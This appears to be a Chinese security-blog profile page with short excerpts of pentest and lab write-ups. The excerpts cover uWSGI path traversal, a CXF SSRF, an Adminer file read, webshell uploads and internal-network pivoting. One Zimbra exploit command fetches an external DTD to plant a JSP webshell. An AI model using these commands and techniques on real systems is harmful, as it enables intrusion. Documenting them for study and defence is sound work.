
简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件,利用该漏洞查看系统上的任意文件。

摘要:通过目录扫描发现目标网站存在文件上传漏洞,成功上传PHP木马获取权限。内网渗透发现双网卡环境,使用Fscan扫描内网并搭建隧道访问10.0.0.*网段。在10.0.0.222服务器发现FCKeditor组件存在文件上传漏洞,通过修改上传文件后缀名绕过限制,最终利用哥斯拉工具成功连接。整个渗透过程涉及外网突破、内网横向移动和漏洞利用等多个环节。
Apache CXF 是一个开源的服务框架,帮助开发者使用 JAX-WS 和 JAX-RS 等前端编程 API 构建和开发服务。Apache CXF 在 4.0.4、3.6.3 和 3.5.8 版本之前存在一个使用 Aegis DataBinding 的 SSRF 漏洞,该漏洞允许攻击者对接受至少一个任意类型参数的 Web 服务执行 SSRF 攻击。此漏洞专门影响使用 Aegis DataBind
Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。
3.生成含有木马的.jsp文件,命名为MM.jsp,语句为:python3 zimbra.py -u https://192.168.42.131 -d http://192.168.42.128:8686/exp.dtd -n Hh -f MM.jsp。扫描该站点目录:dirsearch -u https://192.168.42.131 ,看看有什么有用的信息,发现没什么有用信息。2.将抓到的
通过fping扫描发现靶机IP,利用dirsearch发现管理员界面。使用BurpSuite添加X-Forwarded-For头绕过权限,爆破出admin/admin凭证。通过修改上传文件后缀成功上传PHP木马,用蚁剑连接。发现yousef用户凭据后SSH登录,利用sudo权限提权至root。最终在/root/root.txt中找到Base64编码的flag,解码后显示flag。







